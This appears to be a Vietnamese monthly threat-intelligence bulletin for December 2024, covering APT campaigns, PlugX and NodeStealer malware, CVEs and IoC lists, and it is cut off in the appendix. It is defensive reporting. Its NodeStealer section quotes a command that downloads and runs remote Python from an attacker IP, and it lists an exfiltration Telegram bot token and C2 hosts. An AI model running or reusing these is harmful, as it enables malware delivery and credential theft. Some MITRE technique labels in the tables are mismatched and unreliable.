THÔNG TIN CÁC MỐI ĐE DỌA BẢO MẬT THÁNG 12 – 2024

Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs 

1         CÁC MỐI ĐE DỌA NÂNG CAO – ADVANCED THREATS

Trong tháng 12/2024, đội ngũ NCS ghi nhận các chiến dịch tấn công APT đáng chú ý sau:

STT

                        Tên chiến dịch                                          Mô tả
        1       Chiến dịch gián điệp nhắm vào các tổ chức khu vực Đông Nam Á – Mục tiêu: các lĩnh vực như chính phủ, hàng không, viễn thông….

– Phạm vi/ khu vực: Đông Nam Á

– Công cụ/cách thức tấn công: sử dụng nhiều công cụ open source và living-off-the-land (LOTL) tools

– Mục tiêu chính: thu thập các thông tin tình báo

        2       CleverSoar Malware nhắm đến người dùng tại Việt Nam và Trung Quốc – Phạm vi/ khu vực: Việt Nam và Trung Quốc

– Công cụ/cách thức tấn công: CleverSoar Malware, triển khai thêm các thành phần khác bao gồm Winos4.0 framework, rootkit Nidhogg và custom backdoor.

        3       Chiến dịch email phishing nhằm đánh cắp thông tin đăng nhập – Mục tiêu: nhân viên của các doanh nghiệp và tổ chức thuộc các lĩnh vực bao gồm chính phủ, hàng không vũ trụ, tài chính, năng lượng, viễn thông …

– Phạm vi/ khu vực: 15 khu vực trên toàn thế giới trong đó có Việt Nam

– Công cụ/cách thức tấn công: Khởi tạo truy cập thông qua email phishing, tận dụng các tên miền đáng tin cậy như Adobe.com nhằm vượt qua cơ chế bảo mật và đánh cắp thông tin đăng nhập

        4       Chiến dịch Yokai Backdoor nhắm mục tiêu vào tổ chức tại Thái Lan, sử dụng DLL side-loading Mục tiêu: các quan chức chính phủ

– Phạm vi/ khu vực: Thái Lan

– Công cụ/cách thức tấn công: sử dụng kỹ thuật DLL side-loading nhằm phát tán mã độc có tên Yokai

        5        Phần mềm độc hại SpyLoan nhắm vào người dùng tại Nam Mỹ, Đông Nam Á và Châu Phi Mục tiêu: người dùng có nhu cầu vay tiền

– Phạm vi/ khu vực: Nam Mỹ, Đông Nam Á và Châu Phi.

– Công cụ/cách thức tấn công: Phần mềm độc hại SpyLoan, kẻ tấn công sử dụng kỹ nghệ xã hội nhằm lừa người dùng cung cấp thông tin nhạy cảm, cấp quyền cho ứng dụng…

 

Thông tin chi tiết các chiến dịch:

1.1        Chiến dịch gián điệp nhắm vào các tổ chức khu vực Đông Nam Á

Các nhà nghiên cứu phát hiện chiến dịch gián điệp nhắm mục tiêu vào các tổ chức bao gồm nhiều lĩnh vực khác nhau như chính phủ, hàng không, viễn thông…. khu vực Đông Nam Á. Các cuộc tấn công diễn ra ít nhất từ tháng 10/2023 sử dụng nhiều công cụ open source và living-off-the-land (LOTL) tools với mục tiêu chính là thu thập các thông tin tình báo.

Cuộc tấn công sử dụng công cụ truy cập từ xa kết hợp với Impacket để thực thi lệnh qua WMI (Windows Management Instrumentation), sau đó cài đặt keylogger, password collectors, reverse proxy tools (Rakshasa, Stowaway, ReverseSSH) để duy trì kết nối với cơ sở hạ tầng do kẻ tấn công kiểm soát. Ngoài ra, kẻ tấn công cũng cài đặt các file DLL cho phép chặn thông tin đăng nhập.

Trong quá trình thực hiện, kẻ tấn công duy trì quyền truy cập kéo dài trong nhiều tháng, tập trung vào việc thu thập thông tin đăng nhập bao gồm mật khẩu, mapping network để xác định hệ thống. Việc trích xuất dữ liệu được thực hiện thông qua nhiều kỹ thuật bao gồm thu thập các tệp bằng WinRAR, nén thành các tệp lưu trữ được bảo vệ bằng mật khẩu. Sau đó upload lên các dịch vụ lưu trữ như File.io, cho phép kẻ tấn công trích xuất dữ liệu.

Một số công cụ được sử dụng trong các cuộc tấn công:

  • Dismap: là công cụ open sourceđược phát triển bằng ngôn ngữ Golang, có khả năng nhận dạng thông tin web fingerprint như web/tcp/udp và các asset type liên quan đến domain mục tiêu
  • io exfiltration: sau khi dữ liệu được thu thập sẽ trích xuất đến trang web file-sharing hợp pháp file.io
  • Impacket: là công cụ open sourceviết bằng ngôn ngữ Python, chứa một số công cụ để thực hiện dịch vụ từ xa, trích xuất thông tin xác thực Windows…
  • Infostealer: Công cụ thu thập thông tin tạo ra một thư mục ẩn AppCache và file dat trong C:\Users\[CURRENT USER]\AppData\Local\Microsoft\Windows\AppCache\AppCache.dat. Sau đó mã hóa và ghi lại các thông tin thu thập vào AppCache.dat.
  • Inveigh: công cụ machine-in-the-middle được sử dụng để thực hiện các cuộc tấn công giả mạo, thu thập thông tin xác thực và mã hash.
  • Keylogger: kẻ tấn công cài đặt file DLL cho phép chặn thông tin đăng nhập từ người dùng
  • Living off the land
  • PowerShell: Microsoft scripting tool được sử dụng để thực thi lệnh, download payload, tiến hành reconnaissance hệ thống
  • exe: được sử dụng để chỉnh sửa registry của máy cục bộ hoặc từ xa
  • WMI (Windows Management Instrumentation): sử dụng để thực thi câu lệnh trên máy tính từ xa
  • Rakshasa: công cụ proxy được viết bằng ngôn ngữ Go, công cụ này dành cho multi-level proxy và được Earth Baku sử dụng trước đó.
  • SharpNBTScan: được viết bằng ngôn ngữ C#, công cụ này trước đây được nhóm APT Trung Quốc gọi là Fireant (hay còn gọi là Mustang Panda, APT31, Stately Taurus) sử dụng.
  • WinRAR: sử dụng để lưu trữ hoặc nén các tệp

Indicator of Compromises (IoCs)

Chi tiết xem tại Phụ lục: Danh sách IoCs liên quan đến các chiến dịch tấn công

1.2      CleverSoar Malware nhắm đến người dùng tại Việt Nam và Trung Quốc

Gần đây, NCS Threat Intel ghi nhận bài viết trên blog của các nhà nghiên cứu thuộc Rapid7 với nội dung phát hiện một trình cài đặt độc hại (malware installer) tinh vi và khó phát hiện, nhắm tới người dùng ở Việt Nam và Trung Quốc. Mã độc triển khai thêm các thành phần khác bao gồm Winos4.0 framework, rootkit Nidhogg và custom backdoor. Các thành phần này cho phép ghi lại thao tác bàn phím, trích xuất dữ liệu, lẩn tránh các biện pháp bảo mật. Phân tích của Rapid7 cho thấy một chiến dịch tập trung vào kiểm soát và đánh cắp dữ liệu, nhấn mạnh tính chất tinh vi của nhóm tấn công.

Chi Tiết Kỹ Thuật

Các tệp độc hại được triển khai (drop) thông .msi package tại đường dẫn “C:\Program Files (x86)\WindowsNT\” bao gồm các payload và tệp thực thi Update.exe. Installer sẽ kiểm tra tự tồn tại của thư mục C:\cs và quyền thực thi, mã độc có thể sử dụng “runas” thông qua ShellExecuteA để thực thi với quyền quản trị viên.

Mã độc CleverSoar sử dụng đa dạng kỹ thuật nhằm kiểm tra cũng như lẩn tránh sự phát hiện và đảm bảo cho quá trình thực thi thành công, bao gồm:

– Phát hiện thực thi trong môi trường ảo hóa bằng cách truy xuất SMBIOS firmware

– Xác định các trình giả lập của Windows Defender thông qua các hàm LdrGetDllHandleEx và RtlImageDirectoryEntryToData

– Thay đổi policy ‘Signatures restricted (Microsoft only)’, cho phép thực thi các tệp tin không có chữ ký

– Các kỹ thuật anti-debug như Timing (GetTickCount64), IsDebuggerPresent

– Kiểm tra tên người dùng trên máy, nếu khớp với một số tên người dùng mặc định hay được sử dụng trong môi trường phân tích, thử nghiệm, sandbox(CurrentUser, Sandbox, Emily, HAPUBWS, Hone Lee, IT-ADMIN,…), mã độc sẽ chấm dứt quá trình thực thi

– Một đặc tính của mã độc là kiểm tra ngôn ngữ đang sử dụng trong hệ thống và chỉ thực thi khi khớp với các ngôn ngữ này, chỉ thực thi nếu ngôn ngữ giao diện người dùng khớp với tiếng Trung (ID: 0x804, 0xC04, 0x1404, 0x1004) hoặc tiếng Việt (ID: 0x42A).

Sau khi vượt qua tất cả các bước kiểm tra, installer xác định sự hiện diện của dịch vụ có tên CleverSoarInst. Nếu không có tên dịch vụ này trong hệ thống, mã độc tạo một dịch vụ tạm thời sử dụng pipename có tên \\.\pipe\ntsvcs thông qua RPC nhằm thiết lập dịch vụ CleverSoar, trỏ tới tệp độc hại tProtect.dll nằm tại đường dẫn “C:\Program Files (x86)\Windows NT”. Dịch vụ này được cấu hình để tự động khởi động và sẽ hoạt động như một thành phần của kernel.

MITRE ATT&CK

Tatic

Technique Procedure
Defense Evasion T1562.001 Impair Defenses: Disable or Modify Tools
Defense Evasion T1218.007 System Binary Proxy Execution: Msiexec
Defense Evasion T1497.001 Virtualization/Sandbox Evasion: System Checks
Privilege Escalation T1134.002 Access Token Manipulation: Create Process with

Token

Privilege Escalation T1543 Access Token Manipulation: Create Process with

Token

Discovery T1614.001 Exploitation for Client Execution
Discovery T1082 System Information Discovery
Command and Control T1105 Ingress Tool Transfer

Exfiltration

T1041

Exfiltration Over Command-and-Control Channel

Indicator of Compromises (IoCs)

Chi tiết xem tại Phụ lục:Danh sách IoCs liên quan đến các chiến dịch tấn công

1.3      Chiến dịch email phishing nhằm đánh cắp thông tin đăng nhập

Các nhà nghiên cứu của Group IB phát hiện chiến dịch email phishing nhắm vào nhân viên của các doanh nghiệp và tổ chức từ 15 khu vực trên toàn thế giới, thuộc các lĩnh vực bao gồm chính phủ, hàng không vũ trụ, tài chính, năng lượng, viễn thông …

Vector ban đầu, kẻ tấn công gửi email phishing chứa link độc hại đến mục tiêu, giả mạo các nền tảng tin cậy được sử dụng để quản lý tài liệu và chữ ký điện tử như DocuSign, lừa người dùng nhấp vào link độc hại để xem hoặc ký tài liệu.

Ngoài ra, với cách tiếp cập tinh vi hơn, kẻ tấn công tận dụng các tên miền đáng tin cậy như Adobe.com với mục đích bypass Secure Email Gateways (SEG) và spam filters, các công cụ này có chức năng chặn các tên miền đáng ngờ hoặc không xác định.

Dưới đây là một link được nhúng từ indd.adobe.com – một tên miền phụ hợp pháp của Adobe liên kết với Adobe InDesign, được sử dụng để chia sẻ hoặc xem trước các tệp InDesign trực tuyến. Kẻ tấn công sử dụng tên miền đáng tin cậy để tăng tính hợp pháp nhằm lừa người dùng và vượt qua các cơ chế bảo mật tự động, với mục đích đánh cắp thông tin đăng nhập.

Sau khi nhấp vào liên kết độc hại, nạn nhân được điều hướng đến một trang web phishing được thiết kế tinh vi bao gồm các yếu tố thương hiệu và biểu mẫu đăng nhập được nhập sẵn địa chỉ email của nạn nhân. Khi người dùng nhập mật khẩu, kẻ tấn công sẽ có quyền truy câp trái phép vào các thông tin thương mại nhạy cảm.

Dữ liệu bị đánh cắp sẽ được chuyển đến kẻ tấn công vớithời gian thực, được trích xuất đến một máy chủ C2 hoặc một bot telegram thông qua API.

Kẻ tấn công sử dụng Javascripts snippet nhằm thu thập và truyền thông tin thu thập được đến máy chủ C2. Đoạn mã sử dụng AJAX POST request được chuyển hướng đến endpoint do kẻ tấn công kiểm soát, dữ liệu được gửi bao gồm email và mật khẩu của nạn nhân. Ngoài ra, URL Command-and-Control (C2) được che giấu bằng cách mã hoá dưới dạng hexadecimal hoặc Base64 khiến các công cụ bảo mật khó phát hiện trong quá trình phân tích tĩnh. Khi thực thi, URL mã hoá được giải mã để thực hiện việc trích xuất thông tin của người dùng đến máy chủ của kẻ tấn công.

Trường hợp dữ liệu đánh cắp được truyền đến bot telegram thông qua APT. Sau khi nạn nhân gửi thông tin xác thực, trang phishing sẽ khởi tạo request POST tới ttps://api.telegram.org/bot<token>/sendMessage. Thông tin đánh cắp được gửi dưới dạng message payload đến kẻ tấn công thông qua API telegram, cho phép nhận thông tin theo thời gian thực.

Dựa trên nhật ký lịch sử bot Telegram cho thấy thông tin đăng nhập thu được bao gồm nhiều địa chỉ email doanh nghiệp thuộc nhiều thương hiệu và quốc gia khác nhau trên thế giới.

1.4      Chiến dịch Yokai Backdoor nhắm mục tiêu vào tổ chức tại Thái Lan, sử dụng DLL side-loading

Các nhà nghiên cứu phát hiện chiến dịch nhắm vào các quan chức chính phủ Thái Lan sử dụng kỹ thuật DLL side-loading nhằm phát tán mã độc có tên Yokai.

Kẻ tấn công sử dụng file RAR bao gồm 2 tệp LNK shortcut file được viết bằng tiếng Thái. Khi click vào shortcut files sẽ kích hoạt sao chép nội dung từ ADS (alternate data stream) có tên file.exf vào các tệp mồi nhử (decoy)  PDF và Word sử dụng esentutl. Đây là tệp nhị phân windows thường bị lạm dụng để truyền dữ liệu độc hại từ các luồng dữ liệu thay thế.

Sau quá trình sao chép, các tệp shortcut file sẽ mở những tệp mồi nhử (decoy)

Tệp shortcut file có phần mở rộng DOCX chứa: “file.exf” được dùng để tạo tài liệu giả mạo và “file.ext” chứa mã độc. Payload độc hại được sao chép vào tệp thực thi có tên “file.exe” bằng esentutl. Nếu thành công, command prompt sẽ khởi chạy “file.exe” bằng lệnh start.

Khi file.exe thực thi, drop 3 file vào đường dẫn thư mục C:\ProgramData\police bao gồm một tệp nhị phân hợp pháp liên quan đến ứng dụng iTop Data Recovery (“IdrInit.exe”), một DLL độc hại (“ProductStatistics3.dll”) và một tệp IdrInit.exe.data chứa thông tin được gửi bởi C2.

Nếu Idrlnit.exe được thực thi với tư cách là người dùng, Yokai backdoor sẽ tạo một task schedule MicrosoftTSUpdate để thực thi Idrlnit.exe sau mỗi 5 phút. Trong trường hợp được thực thi với tư cách quản trị, sẽ tạo ra một bản sao của chính nó. Để ngăn không cho chạy nhiều lần trên một máy, backdoor sẽ kiểm tra sự tồn tại của mutex có tên “Mutex_Local_Windows_1547”. Nếu mutex đã tồn tại, sẽ dừng hoạt động, nếu không sẽ tạo tệp mutex. Mã độc thường sử dụng mutex như 1 cơ chế để tránh thực thi trùng lặp trên máy chủ.

MITRE ATT&CK

Tactic Technique
TA0002: Execution T1053: Scheduled Task/Job

T1559: Inter-Process Communication

TA0005: Defense Evasion T1564.004: Hide Artifacts: NTFS File Attributes

T1036: Masquerading

T1574.002: Hijack Execution Flow: DLL Side-Loading

T1480.002: Execution Guardrails: Mutual Exclusion

TA0011: Command and Control T1071.001: Application Layer Protocol: Web Protocols

T1573.001: Encrypted Channel: Symmetric Cryptography

Indicator of Compromises (IoCs)

Chi tiết xem tại Phụ lục:Danh sách IoCs liên quan đến các chiến dịch tấn công

1.5           Phần mềm độc hại SpyLoan nhắm vào người dùng tại Nam Mỹ, Đông Nam Á và Châu Phi

Các nhà nghiên cứu của McAfee cho biết sự gia tăng đáng kể của SpyLoan – ứng dụng cho vay tiền trên phạm vi toàn cầu. Các ứng dụng này sử dụng các kỹ nghệ xã hội nhằm lừa người dùng cung cấp các thông tin nhạy cảm và cấp thêm quyền cho ứng dụng di động, có thể dẫn đến tống tiền, quấy rối…

Một bộ 15 ứng dụng phần mềm độc hại SpyLoan Android mới với hơn 8 triệu lượt cài đặt đã được phát hiện trên Google Play, chủ yếu nhắm vào người dùng từ Nam Mỹ, Đông Nam Á và Châu Phi.

Tên ứng dụng Số lượt tải Quốc gia
Préstamo Seguro-Rápido, seguro 1 triệu Mexico
Préstamo Rápido-Credit Easy 1 triệu Colombia
ได้บาทง่ายๆ-สินเชื่อด่วน 1 triệu Senegal
RupiahKilat-Dana cair 1 triệu Senegal
ยืมอย่างมีความสุข – เงินกู้ 1 triệu Thái Lan
เงินมีความสุข – สินเชื่อด่วน 1 triệu Thái Lan
KreditKu-Uang Online 500.000 Indonesia
Dana Kilat-Pinjaman kecil 500.000 Indonesia
Cash Loan-Vay tiền 100.000 Việt Nam
RapidFinance 100.000 Tanzania
PrêtPourVous 100.000 Senegal
Huayna Money – Préstamo Rápido 100.000 Peru
IPréstamos: Rápido Crédito 100.000 Chile
ConseguirSol-Dinero Rápido 100.000 Peru
ÉcoPrêt Prêt En Ligne 50.000 Thái Lan

Các ứng dụng cho vay được thiết kế bắt chước các tổ chức tài chính uy tín với logo và giao diện tương tự. Để tiếp cận người dùng, kẻ tấn công đã chạy quảng cáo giả mạo các tổ chức uy tín trên các nền tảng mạng xã hội với lãi suất thấp và không yêu cầu thế chấp.

Sau khi nạn nhân cài đặt ứng dụng, người dùng sẽ được xác thực thông qua OTP ( one-time password) để xác định thiết bị và người dùng trong một khu vực. Ứng dụng yêu cầu quyền truy cập tin nhắn SMS, lịch sử cuộc gọi, danh bạ và camera. Khi người dùng cấp phép, ứng dụng sẽ thu thập các dữ liệu nhạy cảm như thông tin nhận dạng cá nhân, dữ liệu tài khoản ngân hàng, dữ liệu thiết bị …

Indicator of Compromises (IoCs)

Chi tiết xem tại Phụ lục:Danh sách IoCs liên quan đến các chiến dịch tấn công

Khuyến nghị:

  • Thực hiện cập nhật các IoCs (mã hash, địa chỉ IP) vào các giải pháp bảo mật phía khách hàng nhằm nâng cao năng lực phòng thủ, giúp giám sát và phát hiện các dấu hiệu bất thường trên hệ thống

2         MALWARE

Đội ngũ NCS ghi nhận các phân tích đáng chú ý về các mẫu mã độc sau:

    STT                        Tiêu đề                                   Mô tả
      1 Cơ sở hạ tầng mới liên quan đến mã độc PlugX Thông qua phân tích phát hiện các kết nối từ khu vực Việt Nam tới cơ sở hạ tầng của PlugX
      2 Mã độc NodeStealer NodeStealer mã độc đánh cắp dữ liệu, nhắm tới tài khoản Facebook Ads Manager

2.1      Các phát hiện mới liên quan đến mã độc PlugX

Đội ngũ Threat Intel NCS ghi nhận 3 domains mới là C2 server được cấu hình trong các biến thể của mã độc PlugX cùng với 3 máy chủ nghi ngờ được nhóm tấn công sử dụng để quản trị cơ sở hạ tầng (administration Server).

Domain Địa chỉ IP  Loại
howtotopics[.]com 116.206.178.34 C2 PlugX
thelocaltribe[.]com 45.32.105.184
councilofwizards[.]com 146.66.215.19
N/A 115.61.168.143  Administration Servers
N/A 115.61.169.139
N/A 182.114.110.170

Phát hiện nhiều tệp tin độc hại được sử dụng bởi nhóm tấn công, với cách thức lây nhiễm thông qua MSC nhằm tải xuống và thực thi tệp tin MSI Adobe-Setup.msi. Tệp tin drop ra 3 files: tệp tin thực thi imecnt.exe, loader DLL và encrypt payload officeime.dat. Địa chỉ C2 được cấu hình trong Plugx là 116.206[.]178.67. Ngoài ra, imecnt.exe cũng được ghi nhận từng được sử dụng để load mã độc ShadowPad trong chiến dịch tấn công khu vực Đông Nam Á. Trong số các IP theo dõi, phát hiện một số địa chỉ IP của nhiều quốc gia trong đó có Việt Nam có các kết nối đến địa chỉ C2 của PlugX 103[.]238.227[.]183, 3.238.225[.]248.

Indicator of Compromises (IoCs)

Chi tiết xem tại Phụ lục:Danh sách IoCs liên quan đến mã độc

2.2      Mã độc NodeStealer

Thông qua email phishing, nhóm tấn công lừa người dùng tải xuống tệp tin định dạng .zip độc hại, sử dụng tệp tin PDF reader thực hiện sideload tệp tin độc hại oledlg.dll. DLL sau đó sẽ thực thi các tệp tin batch file tại đường dẫn “images\active-license.bat” sử dụng cmd.exe. Batch file chứa đoạn encoded powershell sẽ được thực thi thông qua powershell

Powershell thực hiện:

  • Thiết lập giao diện console ở chế độ ẩn
  • Tạo thư mục tại đường dẫn %LocalAppData%\ChromeApplication
  • Giải nén license.rar file tới đường dẫn %LocalAppData%\ChromeApplication
  • Tải xuống và mở tài liệu PDF giả mạo (decoy) tại đường dẫn %User Profile%\document.pdf thông qua command “C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe” “C:\Users\%User Profile%\document.pdf”
  • Thiết lập persistence thông qua startup-folder
  • Download và thực thi payload cuối thông qua command “cmd “/C start “” “%LOCALAPPDATA%\ChromeApplication\synaptics.exe” -c “import requests;exec(requests.get(‘ http[://]88.216.99.5:15707/entry.txt’), verify=False).text)”

entry.txt được lưu trữ trên remote host là obfuscate Python script, sử dụng native python exec() và marsha.loads() để load và thực thi Python bytecode. Dữ liệu sẽ được giải mã thông qua hàm hybrid_decrypt, lưu trong biến code và truyền tới hàm runner để thực thi

Dữ liệu trong biến code được thiết kế như infostealer, thu thập thông tin thẻ cùng các thông tin khác của người dùng lưu trữ ở các trình duyệt web. Ngoài thu thâp và đánh cắp thông tin, chiến dịch nhắm đến các tài khoản Facebook Ads Manager. Các dữ liệu sau đó được nén định dạng zip và đánh cắp thông qua Telegram

  • https[://]api[.]telegram[.]org/bot7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI/sendDocument
  • Chat-id ‘-1002426006531’ hoặc ‘-1002489276039’.

Tham khảo: https://www.trendmicro.com/en_vn/research/24/l/python-based-nodestealer.html

Indicator of Compromises (IoCs)

Chi tiết xem tại Phụ lục:Danh sách IoCs liên quan đến mã độc

Khuyến nghị:

  • Thực hiện cập nhật các IoCs (mã hash, địa chỉ IP) vào các giải pháp bảo mật phía khách hàng nhằm nâng cao năng lực phòng thủ, giúp giám sát và phát hiện các dấu hiệu bất thường trên hệ thống

3         LỖ HỔNG BẢO MẬT

3.1      Microsoft Patch Tuesday –December 2024

Trong tháng 12, Microsoft đã phát hành các bản vá cho 71 CVE mới trong các sản phẩm của Windows và Windows Components, Office và Office Components, SharePoint Server, Hyper-V, Defender for Endpoint, và System Center Operations Manager. Trong đó có 16 lỗ hổng được đánh giá mức độ Critical, 54 lỗ hổng được đánh giá là Important, 1 lỗ hổng được đánh giá Moderate.

Các lỗ hổng nổi bật ghi nhận trong tháng:

      STT

Mã CVE

Tên lỗ hổng Thông tin chung Mức độ cảnh báo
        1

CVE-2024-49138

Windows Common Log File System Driver Elevation of Privilege Vulnerability Tồn tại lỗ hổng leo thang đặc quyền trên Windows Common Log File System Driver cho phép kẻ tấn công giành được đặc quyền SYSTEM Important
        2

CVE-2024-49112

Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability Tồn tại lỗ hổng thực thi mã từ xa trên Windows Lightweight Directory Access Protocol (LDAP) cho phép kẻ tấn công không cần xác thực thực thi mã tùy ý thông qua một tập hợp lệnh call LDAP độc hại Critical
        3

CVE-2024-49117

Windows Hyper-V Remote Code Execution Vulnerability Tồn tại lỗ hổng thi mã từ xa trên Windows Hyper-V cho phép kẻ tấn công gửi các request độc hại đến hardware resources trên VM, dẫn đến thực thi mã từ xa trên host server. Khai thác lỗ hổng yêu cầu xác thực Critical
        4

CVE-2024-49063

Microsoft/Muzic Remote Code Execution Vulnerability Tồn tại lỗ hổng thực thi mã từ xa trên Microsoft/Muzic. Important
        5

CVE-2024-49068

Microsoft SharePoint Elevation of Privilege Vulnerability Tồn tại lỗ hổng leo thang đặc quyền trên Microsoft SharePoint cho phép kẻ tấn công chiếm được quyền của người dùng bị xâm phạm. Important
        6

CVE-2024-49070

Microsoft SharePoint Remote Code Execution Vulnerability Tồn tại lỗ hổng thực thi mã từ xa trên Microsoft SharePoint. Khai thác lỗ hổng yêu cầu kẻ tấn công cần chuẩn bị môi trường mục tiêu. Important

 

 

Khuyến nghị:

  • Thực hiện rà soát và lên kế hoạch cập nhật các bản vá theo hướng dẫn của hãng để đảm bảo an toàn an ninh thông tin hệ thống

3.2      Ứng Dụng Web Và Các Sản Phẩm Khác

   STT

               Mã CVE Tên lỗ hổng Thông tin chung Sản phẩm  Mức độ cảnh báo
      1           CVE-2024-42327 SQL injection in user.get API Tồn tại lỗ hổng SQL Injection trong user.get API trên Zabbix cho phép bất kỳ người dùng không phải quản trị viên có quyền truy cập API, bao gồm cả vai trò mặc định “User”. Kẻ tấn công có thể sử dụng lỗ hổng này để leo thang đặc quyền Zabbix Critical
      2           CVE-2024-42330 Internal strings in HTTP headers Tồn tại lỗ hổng thực thi mã từ xa trên Zabbix bắt nguồn từ việc mã hóa không đúng cách các HTTP headers trong HttpRequest object, cho phép kẻ tấn công tạo các request độc hại dẫn đến thực thi mã từ xa. Zabbix High
      3           CVE-2024-42448 Critical RCE Vulnerability in Veeam VSPC Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên VSPC server. Veeam Service        Provider Console Critical
      4           CVE-2024-40717 A vulnerability allows an authenticated user execute a script with elevated privileges Tồn tại lỗ hổng cho phép kẻ tấn công có vai trò nhất định trong Users and Roles settings trên backup server thực thi tập lệnh với đặc quyền nâng cao bằng cách cấu hình tập lệnh đó thành pre-job hoặc post-job task. Khai thác lỗ hổng yêu cầu xác thực. Veeam Backup &      Replication High
      5           CVE-2024-42451 Low-privileged users to leak all saved credentials in plaintext Tồn tại lỗ hổng cho phép truy cập tất cả các thông tin xác thực dưới dạng bản rõ (plaintext) dẫn đến lộ lọt dữ liệu nhạy cảm, có thể được kẻ tấn công sử dụng cho các cuộc tấn công khác Veeam Backup & Replication High
      6           CVE-2024-53247 Remote Code Execution through Deserialization of Untrusted Data in Splunk Secure Gateway app Tồn tại lỗ hổng trong Splunk Secure Gateway cho phép kẻ tấn công thực thi mã từ xa. Splunk Secure Gateway High
      7           CVE-2024-11639 Authentication Bypass in the admin web console of Ivanti CSA Tồn tại lỗ hổng bỏ qua xác thực trong admin web console trên Ivanti CSA phiên bản trước 5.0.3 cho phép kẻ tấn công không cần xác thực giành được quyền truy cập admin Ivanti Cloud Services Application Critical
      8           CVE-2024-11772 Command injection in the admin web console of Ivanti CSA Tồn tại lỗ hổng Command injection trong admin web console trên Ivanti CSA phiên bản trước 5.0.3 cho phép kẻ tấn công với đặc quyền admin thực thi mã từ xa. Khai thác lỗ hổng yêu cầu xác thực. Ivanti Cloud Services Application (CSA) Critical
      9           CVE-2024-11773 SQL injection in the admin web console of Ivanti CSA Tồn tại lỗ hổng SQL injection trong admin web console trên Ivanti CSA phiên bản trước 5.0.3 cho phép kẻ tấn công với đặc quyền admin thực thi câu lệnh SQL tùy ý. Khai thác lỗ hổng yêu cầu xác thực. Ivanti Cloud Services Application (CSA) Critical
     10           CVE-2024-11633 Argument injection in Ivanti Connect Secure Tồn tại lỗ hổng argument injection trong Ivanti Connect Secure phiên bản trước 22.7R2.4 cho phép kẻ tấn công với đặc quyền admin thực thi mã từ xa. Khai thác lỗ hổng yêu cầu xác thực Ivanti Connect Secure Critical
     11           CVE-2024-11634 Command injection in Ivanti Connect Secure and Ivanti Policy Secure Tồn tại lỗ hổng Command injection trong Ivanti Connect Secure phiên bản trước 22.7R2.4 và Ivanti Policy Secure phiên bản trước 22.7R1.2 cho phép kẻ tấn công với đặc quyền admin thực thi mã từ xa. Khai thác lỗ hổng yêu cầu xác thực. Ivanti Connect Secure & Policy Secure Critical
     12          CVE-2024-53677 File upload logic vulnerability in Apache Struts Tồn tại lỗ hổng trong Apache Struts cho phép kẻ tấn công upload file độc hại, từ đó thực thi mã từ xa. Apache Struts Critical
    13         CVE-2024-50379 Remote Code Execution via write enabled Default Servlet Tồn tại lỗ hổng trong Apache Tomcat cho phép kẻ tấn công thực thi mã từ xa trên các hệ thống file không phân biệt chữ hoa chữ thường (case insensitive) khi servlet mặc định được cấu hình write-enabled (không phải cấu hình mặc định). Việc tải lên (upload) và đọc (read) đồng thời cùng 1 tệp có thể bỏ qua các kiểm tra bảo mật, khiến tệp tải lên được coi như JSP dẫn đến thực thi mã từ xa Apache Tomcat Important

 

Khuyến nghị:

  • Thực hiện rà soát và lên kế hoạch cập nhật các bản vá theo hướng dẫn của hãng để đảm bảo an toàn an ninh thông tin hệ thống

4         PHỤ LỤC

Danh sách các IoC liên quan đến các mã độc/ chiến dịch tấn công mới xuất hiện trong tháng 12/2024.

4.1       Danh sách IoCs liên quan đến các chiến dịch tấn công

4.1.1       Chiến dịch gián điệp nhắm vào các tổ chức khu vực Đông Nam Á

Indicators of Compromise

Hash SHA256

d312b0e1968beae5a2ff3be2d8efc6d1bfdab3b1aec6faf8eafa295c47230194 – Stowaway

e0f3b8028a2969e280efdd770978a54181fc242dd26cbf0a22e922f1e6a1b951 – Batch file loader

33cb9f06338a9ea17107abbdc478071bbe097f80a835bbac462c4bb17cd0b798 – PlugX loader

8b6d081be732743aa6f6bccfb68b3f21878aa36723c1311f50406d752aacc9fa – Keylogger

89707a5bf9862a9effb1618a1a285a8d027fb343f6103f4bc68f736889f0a86e – Keylogger

9fe3ff51443c41fe0be01a55a3a5fbfb261bcf63b3b0cd67f65a2c00a6d52ff3 – Keylogger

e6cecba25abd092bfccba825298edecd2fdee6c428d9ae85399fabc54355e31f – Keylogger loader

779b4a5f53d3128ab53dd8e13c362d6d077c3eb4987f878d7ef3416c801ef0dd – ReverseSSH

e9572549b2f35f32861ffc9be160e9c8f86e4d9d3dd43c3727f0df4dc2acc944 – Infostealer

e0f3b8028a2969e280efdd770978a54181fc242dd26cbf0a22e922f1e6a1b951 – Credential-dumping tool

b7472c6f6cba47ec85fa147c78f3a7a40a4fc5913fe41654ab499a7b1bd4ea2e – Batch file used to register custom DLL to hook into Windows authentication mechanisms

3e4d86c4e1d463b99478f960c9c00f7d11cd0d1fb8dd2948e8340b7bc3550904 – Batch file used to register custom DLL to hook into Windows authentication mechanisms

fb603072418da9150673ac9826a46a2b2462c8fc0afeacb2034ecb2b7d666001 – Batch file used to register custom DLL to hook into Windows authentication mechanisms

340e872c814d221989ca2cb93819b9ad307572851b5b3f8bfcf791ff08e0e677 – Suspicious Windows script file

80c3effc8f017b26c549bed8ba82097a6be7a59e383dd35adc917bf661e0a754 – Windows script file that drops SharpGPOAbuse and Rakshasa

9b1794a1c8c59631d95178c7c4e2f5917b84864b342b4cfdab8f0990c3dbf5d2 – FastReverseProxy

ca0eeb4b71d4124dec785a9492970e9b1cfaa4cab0e8ca4486fc14b2e256d7f7 – Inveigh

d7b85b92fb185272b89a7ff27424bff22a5a6542f6bde9838482aa9f87979828 – Dismap

fa6de0d0bc9d83a3942aa8b3a12a5924dc662bec32cb3c2f212a0a0c0a4ebc7a – SharpNbtscan

10029f14f2718362144b0e9b660994e8fb944af9ce9fcff04925f8b0615bb509 – SharpGPOAbuse

aa096f18e712ac0604e18d16441b672fcb393de9edf3ff4393519c48ab26a158 – Rakshasa

386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd – Bitdefender Crash Handler (2011)

IP

38.60.146[.]78:443 – Stowaway

118.107.219[.]66:443 – Stowaway

45.123.188[.]180 – FastReverseProxy

198.244.237[.]131 – Rakshasa download

4.1.2       CleverSoar Malware nhắm đến người dùng tại Việt Nam và Trung Quốc

